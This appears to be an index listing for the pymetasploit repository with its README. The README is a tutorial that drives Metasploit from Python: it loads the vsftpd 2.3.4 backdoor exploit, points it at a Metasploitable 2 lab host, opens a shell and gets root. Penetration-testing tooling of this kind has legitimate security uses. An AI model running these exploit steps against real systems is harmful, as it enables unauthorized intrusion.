Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/allfro/pymetasploit
A full-fledged msfrpc library for Metasploit framework.
https://github.com/allfro/pymetasploit
Last synced: 3 months ago
JSON representation
A full-fledged msfrpc library for Metasploit framework.
- Host: GitHub
- URL: https://github.com/allfro/pymetasploit
- Owner: allfro
- Created: 2012-07-21T20:58:38.000Z (over 12 years ago)
- Default Branch: master
- Last Pushed: 2021-08-31T18:48:19.000Z (about 3 years ago)
- Last Synced: 2024-07-21T22:27:38.988Z (4 months ago)
- Language: Python
- Size: 78.1 KB
- Stars: 298
- Watchers: 26
- Forks: 141
- Open Issues: 22
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
PyMetasploit - a full-fledged msfrpc library for Python
-------------------------------------------------------PyMetasploit is a full-fledged `msfrpc` library for Python. It is meant to interact with the msfrpcd daemon that comes
with the latest versions of Metasploit. It does NOT interact with the console-based scripts that Metasploit provides
such as msfconsole, msfvenom, etc. Therefore, before you can begin to use this library, you'll need to initialize
`msfrpcd` and optionally (highly recommended) PostgreSQL.# Requirements
Before we begin, you'll need to install the following components:
* **Metasploit:** https://github.com/rapid7/metasploit-framework
* **PostgreSQL (Optional):** http://www.postgresql.orgInstalling PostgreSQL is highly recommended as it will improve response times when querying `msfrpcd` (Metasploit RPC
daemon) for module information.# Tutorial
## Starting `msfrpcd`
`msfrpcd` accepts the following arguments:
```bash
$ ./msfrpcd -hUsage: msfrpcd
OPTIONS:
-P Specify the password to access msfrpcd
-S Disable SSL on the RPC socket
-U Specify the username to access msfrpcd
-a Bind to this IP address
-f Run the daemon in the foreground
-h Help banner
-n Disable database
-p Bind to this port instead of 55553
-u URI for Web server
```The only parameter that is required to launch `msfrpcd` is the `-P` (password) parameter. This specifies the password
that will be used to authenticate users to the daemon. As of this writing, `msfrpcd` only supports one username/password
combination. However, the same user can log into the daemon multiple times. Unless specified otherwise, the `msfrpcd`
daemon listens on port 55553 on all interfaces (`0.0.0.0:55553`).For the purposes of this tutorial let's start the `msfrpcd` daemon with a minimal configuration:
```bash
$ ./msfrpcd -P mypassword -n -f -a 127.0.0.1
[*] MSGRPC starting on 0.0.0.0:55553 (SSL):Msg...
[*] MSGRPC ready at 2014-04-19 23:49:39 -0400.
```The `-f` parameter tells `msfrpcd` to remain in the foreground and the `-n` parameter disables database support.
Finally, the `-a` parameter tells `msfrcpd` to listen for requests only on the local loopback interface (`127.0.0.1`).## `MsfRpcClient` - Brief Overview
### Connecting to `msfrpcd`
Let's get started interacting with the Metasploit framework from python:
```python
>>> from metasploit.msfrpc import MsfRpcClient
>>> client = MsfRpcClient('mypassword')
```The `MsfRpcClient` class provides the core functionality to navigate through the Metasploit framework. Let's take a
look at its underbelly:```python
>>> [m for m in dir(client) if not m.startswith('_')]
['auth', 'authenticated', 'call', 'client', 'consoles', 'core', 'db', 'jobs', 'login', 'logout', 'modules', 'plugins',
'port', 'server', 'sessionid', 'sessions', 'ssl', 'uri']
>>>
```Like the metasploit framework, `MsfRpcClient` is segmented into different management modules:
* **`auth`**: manages the authentication of clients for the `msfrpcd` daemon.
* **`consoles`**: manages interaction with consoles/shells created by Metasploit modules.
* **`core`**: manages the Metasploit framework core.
* **`db`**: manages the backend database connectivity for `msfrpcd`.
* **`modules`**: manages the interaction and configuration of Metasploit modules (i.e. exploits, auxiliaries, etc.)
* **`plugins`**: manages the plugins associated with the Metasploit core.
* **`sessions`**: manages the interaction with Metasploit meterpreter sessions.### Running an Exploit
Just like the Metasploit console, you can retrieve a list of all the modules that are available. Let's take a look at
what exploits are currently loaded:```python
>>> client.modules.exploits
['windows/wins/ms04_045_wins', 'windows/winrm/winrm_script_exec', 'windows/vpn/safenet_ike_11',
'windows/vnc/winvnc_http_get', 'windows/vnc/ultravnc_viewer_bof', 'windows/vnc/ultravnc_client', ...
'aix/rpc_ttdbserverd_realpath', 'aix/rpc_cmsd_opcode21']
>>>
```We can also retrieve a list of `auxiliary`, `encoders`, `nops`, `payloads`, and `post` modules using the same syntax:
```python
>>> client.modules.auxiliary
...
>>> client.modules.encoders
...
>>> client.modules.nops
...
>>> client.modules.payloads
...
>>> client.modules.post
...
```Now let's interact with one of the `exploit` modules:
```python
>>> exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
>>>
```If all is well at this point, you will be able to query the module for various pieces of information such as author,
description, required run-time options, etc. Let's take a look:```python
>>> print exploit.descriptionThis module exploits a malicious backdoor that was added to the VSFTPD download
archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
June 30th 2011 and July 1st 2011 according to the most recent information
available. This backdoor was removed on July 3rd 2011.>>> exploit.authors
['hdm ', 'MC ']
>>> exploit.options
['TCP::send_delay', 'ConnectTimeout', 'SSLVersion', 'VERBOSE', 'SSLCipher', 'CPORT', 'SSLVerifyMode', 'SSL', 'WfsDelay',
'CHOST', 'ContextInformationFile', 'WORKSPACE', 'EnableContextEncoding', 'TCP::max_send_size', 'Proxies',
'DisablePayloadHandler', 'RPORT', 'RHOST']
>>> exploit.required # Required options
['ConnectTimeout', 'RPORT', 'RHOST']
```That's all fine and dandy but you're probably really itching to pop a box with this library right now, amiright!? Let's
do it! Let's use a [Metasploitable 2](http://sourceforge.net/projects/metasploitable/) instance running on a VMWare
machine as our target. Luckily it's running our favorite version of vsFTPd - 2.3.4 - and we already have our exploit
module loaded in PyMetasploit. Our next step is to specify our target:```python
>>> exploit['RHOST'] = '172.16.14.145' # IP of our target host
>>>
```You can also specify or retrieve other options as well, as long as they're listed in `exploit.options`, using the same
method as shown above. For example, let's get and set the `VERBOSE` option:```python
>>> exploit['VERBOSE']
False
>>> exploit['VERBOSE'] = True
>>> exploit['VERBOSE']
True
>>>
```Awesome! So now we're ready to execute our exploit. All we need to do is select a payload:
```python
>>> exploit.payloads
['cmd/unix/interact']
>>>
```At this point, this exploit only supports one payload (`cmd/unix/interact`). So let's pop a shell:
```python
>>> exploit.execute(payload='cmd/unix/interact')
{'job_id': 1, 'uuid': '3whbuevf'}
>>>
```Excellent! It looks like our exploit ran successfully. How can we tell? The `job_id` key contains a number. If the
module failed to execute for any reason, `job_id` would be `None`. For long running modules, you may want to poll the
job list by checking `client.jobs.list`. Since this is a fairly quick exploit, the job list will most likely be empty
and if we managed to pop our box, we might see something nice in the sessions list:```python
>>> client.sessions.list
{1: {'info': '', 'username': 'ndouba', 'session_port': 21, 'via_payload': 'payload/cmd/unix/interact',
'uuid': '5orqnnyv', 'tunnel_local': '172.16.14.1:58429', 'via_exploit': 'exploit/unix/ftp/vsftpd_234_backdoor',
'exploit_uuid': '3whbuevf', 'tunnel_peer': '172.16.14.145:6200', 'workspace': 'false', 'routes': '',
'target_host': '172.16.14.145', 'type': 'shell', 'session_host': '172.16.14.145', 'desc': 'Command shell'}}
>>>
```Success! We managed to pop the box! `client.sessions.list` shows us that we have a live session with the same `uuid` as
the one we received when executing the module earlier (`exploit.execute()`). Let's interact with the shell:```python
>>> shell = client.sessions.session(1)
>>> shell.write('whoami\n')
>>> print shell.read()
root
>>> # Happy dance!
```This is just a sample of how powerful PyMetasploit can be. Use your powers wisely, Grasshopper, because with great power
comes great responsibility – unless you are a banker.# Questions?
Email me at ndouba.at.gmail.com